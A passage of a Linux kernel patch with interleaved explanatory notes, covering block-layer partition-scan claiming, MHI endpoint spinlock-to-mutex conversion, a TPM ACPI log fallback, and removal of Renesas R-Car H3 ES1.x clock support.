++	if (!(mode & FMODE_EXCL))
++		bd_abort_claiming(disk->part0, disk_scan_partitions);
++	return ret;
+ }
+ 
+ /**
+@@ -497,9 +511,14 @@ int __must_check device_add_disk(struct device *parent, struct gendisk *disk,
+ 		if (ret)
+ 			goto out_unregister_bdi;
+ 
++		/* Make sure the first partition scan will proceed */
++		if (get_capacity(disk) && !(disk->flags & GENHD_FL_NO_PART) &&
++		    !test_bit(GD_SUPPRESS_PART_SCAN, &disk->state))
++			set_bit(GD_NEED_PART_SCAN, &disk->state);
++
+ 		bdev_add(disk->part0, ddev->devt);
+ 		if (get_capacity(disk))
+-			disk_scan_partitions(disk, FMODE_READ, NULL);
++			disk_scan_partitions(disk, FMODE_READ);
+ 
+ 		/*
+ 		 * Announce the disk and partitions after all partitions are
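
The rewritten disk_scan_partitions() replaces the racy bd_holder comparison
with the block layer's claiming protocol: a non-exclusive caller stakes a
claim with bd_prepare_to_claim(), opens without FMODE_EXCL so the scan still
runs, then releases the claim with bd_abort_claiming(). Condensed to that
shape (kernel calls as in the hunk; the FMODE_EXCL short-circuit and error
details are elided, so this is a sketch, not buildable on its own):

static int scan_claimed(struct gendisk *disk, fmode_t mode)
{
	struct block_device *bdev;
	int ret;

	ret = bd_prepare_to_claim(disk->part0, scan_claimed);  /* stake claim */
	if (ret)
		return ret;

	bdev = blkdev_get_by_dev(disk_devt(disk), mode & ~FMODE_EXCL, NULL);
	if (IS_ERR(bdev))
		ret = PTR_ERR(bdev);
	else
		blkdev_put(bdev, mode & ~FMODE_EXCL);

	bd_abort_claiming(disk->part0, scan_claimed);           /* release */
	return ret;
}
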
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 96617512982e5..9c5f637ff153f 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -467,10 +467,10 @@ static int blkdev_bszset(struct block_device *bdev, fmode_t mode,
+  * user space. Note the separate arg/argp parameters that are needed
+  * to deal with the compat_ptr() conversion.
+  */
+-static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+-			       unsigned long arg, void __user *argp)
++static int blkdev_common_ioctl(struct block_device *bdev, fmode_t mode,
++			       unsigned int cmd, unsigned long arg,
++			       void __user *argp)
+ {
+-	struct block_device *bdev = I_BDEV(file->f_mapping->host);
+ 	unsigned int max_sectors;
+ 
+ 	switch (cmd) {
+@@ -528,8 +528,7 @@ static int blkdev_common_ioctl(struct file *file, fmode_t mode, unsigned cmd,
+ 			return -EACCES;
+ 		if (bdev_is_partition(bdev))
+ 			return -EINVAL;
+-		return disk_scan_partitions(bdev->bd_disk, mode & ~FMODE_EXCL,
+-					    file);
++		return disk_scan_partitions(bdev->bd_disk, mode);
+ 	case BLKTRACESTART:
+ 	case BLKTRACESTOP:
+ 	case BLKTRACETEARDOWN:
+@@ -607,7 +606,7 @@ long blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret != -ENOIOCTLCMD)
+ 		return ret;
+ 
+@@ -676,7 +675,7 @@ long compat_blkdev_ioctl(struct file *file, unsigned cmd, unsigned long arg)
+ 		break;
+ 	}
+ 
+-	ret = blkdev_common_ioctl(file, mode, cmd, arg, argp);
++	ret = blkdev_common_ioctl(bdev, mode, cmd, arg, argp);
+ 	if (ret == -ENOIOCTLCMD && disk->fops->compat_ioctl)
+ 		ret = disk->fops->compat_ioctl(bdev, mode, cmd, arg);
+ 
+diff --git a/drivers/bus/mhi/ep/main.c b/drivers/bus/mhi/ep/main.c
+index 357c61c12ce5b..edd153dda40c0 100644
+--- a/drivers/bus/mhi/ep/main.c
++++ b/drivers/bus/mhi/ep/main.c
+@@ -990,44 +990,25 @@ static void mhi_ep_abort_transfer(struct mhi_ep_cntrl *mhi_cntrl)
+ static void mhi_ep_reset_worker(struct work_struct *work)
+ {
+ 	struct mhi_ep_cntrl *mhi_cntrl = container_of(work, struct mhi_ep_cntrl, reset_work);
+-	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	enum mhi_state cur_state;
+-	int ret;
+ 
+-	mhi_ep_abort_transfer(mhi_cntrl);
++	mhi_ep_power_down(mhi_cntrl);
++
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+ 	/* Reset MMIO to signal host that the MHI_RESET is completed in endpoint */
+ 	mhi_ep_mmio_reset(mhi_cntrl);
+ 	cur_state = mhi_cntrl->mhi_state;
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+ 
+ 	/*
+ 	 * Only proceed further if the reset is due to SYS_ERR. The host will
+ 	 * also issue reset during shutdown, and we don't need to re-init in
+ 	 * that case.
+ 	 */
+-	if (cur_state == MHI_STATE_SYS_ERR) {
+-		mhi_ep_mmio_init(mhi_cntrl);
+-
+-		/* Set AMSS EE before signaling ready state */
+-		mhi_ep_mmio_set_env(mhi_cntrl, MHI_EE_AMSS);
+-
+-		/* All set, notify the host that we are ready */
+-		ret = mhi_ep_set_ready_state(mhi_cntrl);
+-		if (ret)
+-			return;
+-
+-		dev_dbg(dev, "READY state notification sent to the host\n");
++	if (cur_state == MHI_STATE_SYS_ERR)
++		mhi_ep_power_up(mhi_cntrl);
+ 
+-		ret = mhi_ep_enable(mhi_cntrl);
+-		if (ret) {
+-			dev_err(dev, "Failed to enable MHI endpoint: %d\n", ret);
+-			return;
+-		}
+-
+-		enable_irq(mhi_cntrl->irq);
+-	}
++	mutex_unlock(&mhi_cntrl->state_lock);
+ }
+ 
+ /*
+@@ -1106,11 +1087,11 @@ EXPORT_SYMBOL_GPL(mhi_ep_power_up);
+ 
+ void mhi_ep_power_down(struct mhi_ep_cntrl *mhi_cntrl)
+ {
+-	if (mhi_cntrl->enabled)
++	if (mhi_cntrl->enabled) {
+ 		mhi_ep_abort_transfer(mhi_cntrl);
+-
+-	kfree(mhi_cntrl->mhi_event);
+-	disable_irq(mhi_cntrl->irq);
++		kfree(mhi_cntrl->mhi_event);
++		disable_irq(mhi_cntrl->irq);
++	}
+ }
+ EXPORT_SYMBOL_GPL(mhi_ep_power_down);
+ 
+@@ -1400,8 +1381,8 @@ int mhi_ep_register_controller(struct mhi_ep_cntrl *mhi_cntrl,
+ 
+ 	INIT_LIST_HEAD(&mhi_cntrl->st_transition_list);
+ 	INIT_LIST_HEAD(&mhi_cntrl->ch_db_list);
+-	spin_lock_init(&mhi_cntrl->state_lock);
+ 	spin_lock_init(&mhi_cntrl->list_lock);
++	mutex_init(&mhi_cntrl->state_lock);
+ 	mutex_init(&mhi_cntrl->event_lock);
+ 
+ 	/* Set MHI version and AMSS EE before enumeration */
+diff --git a/drivers/bus/mhi/ep/sm.c b/drivers/bus/mhi/ep/sm.c
+index 3655c19e23c7b..fd200b2ac0bb2 100644
+--- a/drivers/bus/mhi/ep/sm.c
++++ b/drivers/bus/mhi/ep/sm.c
+@@ -63,24 +63,23 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	int ret;
+ 
+ 	/* If MHI is in M3, resume suspended channels */
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	old_state = mhi_cntrl->mhi_state;
+ 	if (old_state == MHI_STATE_M3)
+ 		mhi_ep_resume_channels(mhi_cntrl);
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M0);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	/* Signal host that the device moved to M0 */
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M0);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M0 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	if (old_state == MHI_STATE_READY) {
+@@ -88,11 +87,14 @@ int mhi_ep_set_m0_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 		ret = mhi_ep_send_ee_event(mhi_cntrl, MHI_EE_AMSS);
+ 		if (ret) {
+ 			dev_err(dev, "Failed sending AMSS EE event\n");
+-			return ret;
++			goto err_unlock;
+ 		}
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -100,13 +102,12 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	struct device *dev = &mhi_cntrl->mhi_dev->dev;
+ 	int ret;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
+-	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
+ 
++	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+ 	mhi_ep_suspend_channels(mhi_cntrl);
+@@ -115,10 +116,13 @@ int mhi_ep_set_m3_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	ret = mhi_ep_send_state_change_event(mhi_cntrl, MHI_STATE_M3);
+ 	if (ret) {
+ 		dev_err(dev, "Failed sending M3 state change event\n");
+-		return ret;
++		goto err_unlock;
+ 	}
+ 
+-	return 0;
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
++	return ret;
+ }
+ 
+ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+@@ -127,22 +131,24 @@ int mhi_ep_set_ready_state(struct mhi_ep_cntrl *mhi_cntrl)
+ 	enum mhi_state mhi_state;
+ 	int ret, is_ready;
+ 
+-	spin_lock_bh(&mhi_cntrl->state_lock);
++	mutex_lock(&mhi_cntrl->state_lock);
++
+ 	/* Ensure that the MHISTATUS is set to RESET by host */
+ 	mhi_state = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_MHISTATE_MASK);
+ 	is_ready = mhi_ep_mmio_masked_read(mhi_cntrl, EP_MHISTATUS, MHISTATUS_READY_MASK);
+ 
+ 	if (mhi_state != MHI_STATE_RESET || is_ready) {
+ 		dev_err(dev, "READY state transition failed. MHI host not in RESET state\n");
+-		spin_unlock_bh(&mhi_cntrl->state_lock);
+-		return -EIO;
++		ret = -EIO;
++		goto err_unlock;
+ 	}
+ 
+ 	ret = mhi_ep_set_mhi_state(mhi_cntrl, MHI_STATE_READY);
+-	spin_unlock_bh(&mhi_cntrl->state_lock);
+-
+ 	if (ret)
+ 		mhi_ep_handle_syserr(mhi_cntrl);
+ 
++err_unlock:
++	mutex_unlock(&mhi_cntrl->state_lock);
++
+ 	return ret;
+ }
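
Across sm.c, the conversion from spin_lock_bh() to a mutex also funnels every
function onto a single unlock path: each early return becomes a goto to one
err_unlock label, which the success path falls through as well. The skeleton,
reduced to its locking shape with illustrative names:

#include <pthread.h>

struct ctrl { pthread_mutex_t state_lock; };

static int step_one(struct ctrl *c) { (void)c; return 0; }
static int step_two(struct ctrl *c) { (void)c; return 0; }

static int set_state(struct ctrl *c)
{
	int ret;

	pthread_mutex_lock(&c->state_lock);

	ret = step_one(c);
	if (ret)
		goto err_unlock;

	ret = step_two(c);      /* success also reaches the label below */

err_unlock:
	pthread_mutex_unlock(&c->state_lock);
	return ret;
}
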
+diff --git a/drivers/char/tpm/eventlog/acpi.c b/drivers/char/tpm/eventlog/acpi.c
+index 0913d3eb8d518..cd266021d0103 100644
+--- a/drivers/char/tpm/eventlog/acpi.c
++++ b/drivers/char/tpm/eventlog/acpi.c
+@@ -143,8 +143,12 @@ int tpm_read_log_acpi(struct tpm_chip *chip)
+ 
+ 	ret = -EIO;
+ 	virt = acpi_os_map_iomem(start, len);
+-	if (!virt)
++	if (!virt) {
++		dev_warn(&chip->dev, "%s: Failed to map ACPI memory\n", __func__);
++		/* try EFI log next */
++		ret = -ENODEV;
+ 		goto err;
++	}
+ 
+ 	memcpy_fromio(log->bios_event_log, virt, len);
+ 
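
The tpm hunk distinguishes a failure worth reporting (-EIO) from one that
should fall through to the next log source (-ENODEV). That convention
generalizes to any ordered-fallback probe; a small sketch with illustrative
names and stubbed sources:

#include <errno.h>

static int read_log_acpi(void) { return -ENODEV; }  /* stubbed sources */
static int read_log_efi(void)  { return 0; }

static int read_log(void)
{
	int rc = read_log_acpi();

	if (rc != -ENODEV)
		return rc;          /* success, or a hard failure */
	return read_log_efi();      /* ACPI source unusable: try EFI */
}
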
+diff --git a/drivers/clk/renesas/Kconfig b/drivers/clk/renesas/Kconfig
+index cacaf9b87d264..37632a0659d82 100644
+--- a/drivers/clk/renesas/Kconfig
++++ b/drivers/clk/renesas/Kconfig
+@@ -22,7 +22,7 @@ config CLK_RENESAS
+ 	select CLK_R8A7791 if ARCH_R8A7791 || ARCH_R8A7793
+ 	select CLK_R8A7792 if ARCH_R8A7792
+ 	select CLK_R8A7794 if ARCH_R8A7794
+-	select CLK_R8A7795 if ARCH_R8A77950 || ARCH_R8A77951
++	select CLK_R8A7795 if ARCH_R8A77951
+ 	select CLK_R8A77960 if ARCH_R8A77960
+ 	select CLK_R8A77961 if ARCH_R8A77961
+ 	select CLK_R8A77965 if ARCH_R8A77965
+diff --git a/drivers/clk/renesas/r8a7795-cpg-mssr.c b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+index 301475c74f500..7a585a777d387 100644
+--- a/drivers/clk/renesas/r8a7795-cpg-mssr.c
++++ b/drivers/clk/renesas/r8a7795-cpg-mssr.c
+@@ -128,7 +128,6 @@ static struct cpg_core_clk r8a7795_core_clks[] __initdata = {
+ };
+ 
+ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+-	DEF_MOD("fdp1-2",		 117,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fdp1-1",		 118,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fdp1-0",		 119,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("tmu4",			 121,	R8A7795_CLK_S0D6),
+@@ -162,7 +161,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("pcie1",		 318,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("pcie0",		 319,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac30",		 326,	R8A7795_CLK_S3D1),
+-	DEF_MOD("usb3-if1",		 327,	R8A7795_CLK_S3D1), /* ES1.x */
+ 	DEF_MOD("usb3-if0",		 328,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac31",		 329,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("usb-dmac0",		 330,	R8A7795_CLK_S3D1),
+@@ -187,28 +185,21 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("hscif0",		 520,	R8A7795_CLK_S3D1),
+ 	DEF_MOD("thermal",		 522,	R8A7795_CLK_CP),
+ 	DEF_MOD("pwm",			 523,	R8A7795_CLK_S0D12),
+-	DEF_MOD("fcpvd3",		 600,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvd2",		 601,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd1",		 602,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvd0",		 603,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("fcpvb1",		 606,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvb0",		 607,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpvi2",		 609,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpvi1",		 610,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpvi0",		 611,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpf2",		 613,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpf1",		 614,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("fcpf0",		 615,	R8A7795_CLK_S0D1),
+-	DEF_MOD("fcpci1",		 616,	R8A7795_CLK_S2D1), /* ES1.x */
+-	DEF_MOD("fcpci0",		 617,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("fcpcs",		 619,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspd3",		 620,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspd2",		 621,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd1",		 622,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspd0",		 623,	R8A7795_CLK_S0D2),
+ 	DEF_MOD("vspbc",		 624,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspbd",		 626,	R8A7795_CLK_S0D1),
+-	DEF_MOD("vspi2",		 629,	R8A7795_CLK_S2D1), /* ES1.x */
+ 	DEF_MOD("vspi1",		 630,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("vspi0",		 631,	R8A7795_CLK_S0D1),
+ 	DEF_MOD("ehci3",		 700,	R8A7795_CLK_S3D2),
+@@ -221,7 +212,6 @@ static struct mssr_mod_clk r8a7795_mod_clks[] __initdata = {
+ 	DEF_MOD("cmm2",			 709,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm1",			 710,	R8A7795_CLK_S2D1),
+ 	DEF_MOD("cmm0",			 711,	R8A7795_CLK_S2D1),
+-	DEF_MOD("csi21",		 713,	R8A7795_CLK_CSI0), /* ES1.x */
+ 	DEF_MOD("csi20",		 714,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi41",		 715,	R8A7795_CLK_CSI0),
+ 	DEF_MOD("csi40",		 716,	R8A7795_CLK_CSI0),
+@@ -350,103 +340,26 @@ static const struct rcar_gen3_cpg_pll_config cpg_pll_configs[16] __initconst = {
+ 	{ 2,		192,	1,	192,	1,	32,	},
+ };
+ 
+-static const struct soc_device_attribute r8a7795es1[] __initconst = {
++static const struct soc_device_attribute r8a7795_denylist[] __initconst = {
+ 	{ .soc_id = "r8a7795", .revision = "ES1.*" },
+ 	{ /* sentinel */ }
+ };
+ 
+-
+-	/*
+-	 * Fixups for R-Car H3 ES1.x
+-	 */
+-
+-static const unsigned int r8a7795es1_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(326),			/* USB-DMAC3-0 */
+-	MOD_CLK_ID(329),			/* USB-DMAC3-1 */
+-	MOD_CLK_ID(700),			/* EHCI/OHCI3 */
+-	MOD_CLK_ID(705),			/* HS-USB-IF3 */
+-
+-};
+-
+-static const struct mssr_mod_reparent r8a7795es1_mod_reparent[] __initconst = {
+-	{ MOD_CLK_ID(118), R8A7795_CLK_S2D1 },	/* FDP1-1 */
+-	{ MOD_CLK_ID(119), R8A7795_CLK_S2D1 },	/* FDP1-0 */
+-	{ MOD_CLK_ID(121), R8A7795_CLK_S3D2 },	/* TMU4 */
+-	{ MOD_CLK_ID(217), R8A7795_CLK_S3D1 },	/* SYS-DMAC2 */
+-	{ MOD_CLK_ID(218), R8A7795_CLK_S3D1 },	/* SYS-DMAC1 */
+-	{ MOD_CLK_ID(219), R8A7795_CLK_S3D1 },	/* SYS-DMAC0 */
+-	{ MOD_CLK_ID(408), R8A7795_CLK_S3D1 },	/* INTC-AP */
+-	{ MOD_CLK_ID(501), R8A7795_CLK_S3D1 },	/* AUDMAC1 */
+-	{ MOD_CLK_ID(502), R8A7795_CLK_S3D1 },	/* AUDMAC0 */
+-	{ MOD_CLK_ID(523), R8A7795_CLK_S3D4 },	/* PWM */
+-	{ MOD_CLK_ID(601), R8A7795_CLK_S2D1 },	/* FCPVD2 */
+-	{ MOD_CLK_ID(602), R8A7795_CLK_S2D1 },	/* FCPVD1 */
+-	{ MOD_CLK_ID(603), R8A7795_CLK_S2D1 },	/* FCPVD0 */
+-	{ MOD_CLK_ID(606), R8A7795_CLK_S2D1 },	/* FCPVB1 */
+-	{ MOD_CLK_ID(607), R8A7795_CLK_S2D1 },	/* FCPVB0 */
+-	{ MOD_CLK_ID(610), R8A7795_CLK_S2D1 },	/* FCPVI1 */
+-	{ MOD_CLK_ID(611), R8A7795_CLK_S2D1 },	/* FCPVI0 */
+-	{ MOD_CLK_ID(614), R8A7795_CLK_S2D1 },	/* FCPF1 */
+-	{ MOD_CLK_ID(615), R8A7795_CLK_S2D1 },	/* FCPF0 */
+-	{ MOD_CLK_ID(619), R8A7795_CLK_S2D1 },	/* FCPCS */
+-	{ MOD_CLK_ID(621), R8A7795_CLK_S2D1 },	/* VSPD2 */
+-	{ MOD_CLK_ID(622), R8A7795_CLK_S2D1 },	/* VSPD1 */
+-	{ MOD_CLK_ID(623), R8A7795_CLK_S2D1 },	/* VSPD0 */
+-	{ MOD_CLK_ID(624), R8A7795_CLK_S2D1 },	/* VSPBC */
+-	{ MOD_CLK_ID(626), R8A7795_CLK_S2D1 },	/* VSPBD */
+-	{ MOD_CLK_ID(630), R8A7795_CLK_S2D1 },	/* VSPI1 */
+-	{ MOD_CLK_ID(631), R8A7795_CLK_S2D1 },	/* VSPI0 */
+-	{ MOD_CLK_ID(804), R8A7795_CLK_S2D1 },	/* VIN7 */
+-	{ MOD_CLK_ID(805), R8A7795_CLK_S2D1 },	/* VIN6 */
+-	{ MOD_CLK_ID(806), R8A7795_CLK_S2D1 },	/* VIN5 */
+-	{ MOD_CLK_ID(807), R8A7795_CLK_S2D1 },	/* VIN4 */
+-	{ MOD_CLK_ID(808), R8A7795_CLK_S2D1 },	/* VIN3 */
+-	{ MOD_CLK_ID(809), R8A7795_CLK_S2D1 },	/* VIN2 */
+-	{ MOD_CLK_ID(810), R8A7795_CLK_S2D1 },	/* VIN1 */
+-	{ MOD_CLK_ID(811), R8A7795_CLK_S2D1 },	/* VIN0 */
+-	{ MOD_CLK_ID(812), R8A7795_CLK_S3D2 },	/* EAVB-IF */
+-	{ MOD_CLK_ID(820), R8A7795_CLK_S2D1 },	/* IMR3 */
+-	{ MOD_CLK_ID(821), R8A7795_CLK_S2D1 },	/* IMR2 */
+-	{ MOD_CLK_ID(822), R8A7795_CLK_S2D1 },	/* IMR1 */
+-	{ MOD_CLK_ID(823), R8A7795_CLK_S2D1 },	/* IMR0 */
+-	{ MOD_CLK_ID(905), R8A7795_CLK_CP },	/* GPIO7 */
+-	{ MOD_CLK_ID(906), R8A7795_CLK_CP },	/* GPIO6 */
+-	{ MOD_CLK_ID(907), R8A7795_CLK_CP },	/* GPIO5 */
+-	{ MOD_CLK_ID(908), R8A7795_CLK_CP },	/* GPIO4 */
+-	{ MOD_CLK_ID(909), R8A7795_CLK_CP },	/* GPIO3 */
+-	{ MOD_CLK_ID(910), R8A7795_CLK_CP },	/* GPIO2 */
+-	{ MOD_CLK_ID(911), R8A7795_CLK_CP },	/* GPIO1 */
+-	{ MOD_CLK_ID(912), R8A7795_CLK_CP },	/* GPIO0 */
+-	{ MOD_CLK_ID(918), R8A7795_CLK_S3D2 },	/* I2C6 */
+-	{ MOD_CLK_ID(919), R8A7795_CLK_S3D2 },	/* I2C5 */
+-	{ MOD_CLK_ID(927), R8A7795_CLK_S3D2 },	/* I2C4 */
+-	{ MOD_CLK_ID(928), R8A7795_CLK_S3D2 },	/* I2C3 */
+-};
+-
+-
+-	/*
+-	 * Fixups for R-Car H3 ES2.x
+-	 */
+-
+-static const unsigned int r8a7795es2_mod_nullify[] __initconst = {
+-	MOD_CLK_ID(117),			/* FDP1-2 */
+-	MOD_CLK_ID(327),			/* USB3-IF1 */
+-	MOD_CLK_ID(600),			/* FCPVD3 */
+-	MOD_CLK_ID(609),			/* FCPVI2 */
+-	MOD_CLK_ID(613),			/* FCPF2 */
+-	MOD_CLK_ID(616),			/* FCPCI1 */
+-	MOD_CLK_ID(617),			/* FCPCI0 */
+-	MOD_CLK_ID(620),			/* VSPD3 */
+-	MOD_CLK_ID(629),			/* VSPI2 */
+-	MOD_CLK_ID(713),			/* CSI21 */
+-};
+-
+ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ {
+ 	const struct rcar_gen3_cpg_pll_config *cpg_pll_config;
+ 	u32 cpg_mode;
+ 	int error;
+ 
++	/*
++	 * We panic here to ensure removed SoCs and clk updates are always in
++	 * sync to avoid overclocking damage. The panic can only be seen with
++	 * commandline args 'earlycon keep_bootcon'. But these SoCs were for
++	 * developers only anyhow.
++	 */
++	if (soc_device_match(r8a7795_denylist))
++		panic("SoC not supported anymore!\n");
++
+ 	error = rcar_rst_read_mode_pins(&cpg_mode);
+ 	if (error)
+ 		return error;
+@@ -457,25 +370,6 @@ static int __init r8a7795_cpg_mssr_init(struct device *dev)
+ 		return -EINVAL;
+ 	}
+ 
+-	if (soc_device_match(r8a7795es1)) {
+-		cpg_core_nullify_range(r8a7795_core_clks,
+-				       ARRAY_SIZE(r8a7795_core_clks),
+-				       R8A7795_CLK_S0D2, R8A7795_CLK_S0D12);
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es1_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es1_mod_nullify));
+-		mssr_mod_reparent(r8a7795_mod_clks,
+-				  ARRAY_SIZE(r8a7795_mod_clks),
+-				  r8a7795es1_mod_reparent,
+-				  ARRAY_SIZE(r8a7795es1_mod_reparent));
+-	} else {
+-		mssr_mod_nullify(r8a7795_mod_clks,
+-				 ARRAY_SIZE(r8a7795_mod_clks),
+-				 r8a7795es2_mod_nullify,
+-				 ARRAY_SIZE(r8a7795es2_mod_nullify));
+-	}
+-
+ 	return rcar_gen3_cpg_init(cpg_pll_config, CLK_EXTALR, cpg_mode);
+ }
+ 
+diff --git a/drivers/clk/renesas/rcar-gen3-cpg.c b/drivers/clk/renesas/rcar-gen3-cpg.c
+index e668f23c75e7d..b3ef62fa612e3 100644
+--- a/drivers/clk/renesas/rcar-gen3-cpg.c
++++ b/drivers/clk/renesas/rcar-gen3-cpg.c
+@@ -310,19 +310,10 @@ static unsigned int cpg_clk_extalr __initdata;
+ static u32 cpg_mode __initdata;
+ static u32 cpg_quirks __initdata;
+ 
+-#define PLL_ERRATA	BIT(0)		/* Missing PLL0/2/4 post-divider */
+ #define RCKCR_CKSEL	BIT(1)		/* Manual RCLK parent selection */
+ 
+ 
+ static const struct soc_device_attribute cpg_quirks_match[] __initconst = {
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.0",
+-		.data = (void *)(PLL_ERRATA | RCKCR_CKSEL),
+-	},
+-	{
+-		.soc_id = "r8a7795", .revision = "ES1.*",
+-		.data = (void *)(RCKCR_CKSEL),
+-	},
+ 	{
+ 		.soc_id = "r8a7796", .revision = "ES1.0",
+ 		.data = (void *)(RCKCR_CKSEL),
+@@ -355,9 +346,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL0CR, 0);
++					    base, 2, CPG_PLL0CR, 0);
+ 
+ 	case CLK_TYPE_GEN3_PLL1:
+ 		mult = cpg_pll_config->pll1_mult;
+@@ -370,9 +360,8 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 * multiplier when cpufreq changes between normal and boost
+ 		 * modes.
+ 		 */
+-		mult = (cpg_quirks & PLL_ERRATA) ? 4 : 2;
+ 		return cpg_pll_clk_register(core->name, __clk_get_name(parent),
+-					    base, mult, CPG_PLL2CR, 2);
++					    base, 2, CPG_PLL2CR, 2);
+ 
+ 	case CLK_TYPE_GEN3_PLL3:
+ 		mult = cpg_pll_config->pll3_mult;
+@@ -388,8 +377,6 @@ struct clk * __init rcar_gen3_cpg_clk_register(struct device *dev,
+ 		 */
+ 		value = readl(base + CPG_PLL4CR);
+ 		mult = (((value >> 24) & 0x7f) + 1) * 2;
+-		if (cpg_quirks & PLL_ERRATA)
+-			mult *= 2;
+ 		break;
+ 
+ 	case CLK_TYPE_GEN3_SDH:
+diff --git a/drivers/clk/renesas/renesas-cpg-mssr.c b/drivers/clk/renesas/renesas-cpg-mssr.c
+index 1a0cdf001b2f2..523fd45231571 100644
+--- a/drivers/clk/renesas/renesas-cpg-mssr.c
++++ b/drivers/clk/renesas/renesas-cpg-mssr.c
+@@ -1113,19 +1113,6 @@ static int __init cpg_mssr_init(void)
+ 
+ subsys_initcall(cpg_mssr_init);
+ 
+-void __init cpg_core_nullify_range(struct cpg_core_clk *core_clks,
+-				   unsigned int num_core_clks,
+-				   unsigned int first_clk,
+-				   unsigned int last_clk)
+-{
+-	unsigned int i;
+-
+-	for (i = 0; i < num_core_clks; i++)
+-		if (core_clks[i].id >= first_clk &&
+-		    core_clks[i].id <= last_clk)
+-			core_clks[i].name = NULL;
+-}
+-
+ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 			     unsigned int num_mod_clks,
+ 			     const unsigned int *clks, unsigned int n)
+@@ -1139,19 +1126,5 @@ void __init mssr_mod_nullify(struct mssr_mod_clk *mod_clks,
+ 		}
+ }
+ 
+-void __init mssr_mod_reparent(struct mssr_mod_clk *mod_clks,
+-			      unsigned int num_mod_clks,
+-			      const struct mssr_mod_reparent *clks,
+-			      unsigned int n)
+-{
+-	unsigned int i, j;
+-
+-	for (i = 0, j = 0; i < num_mod_clks && j < n; i++)
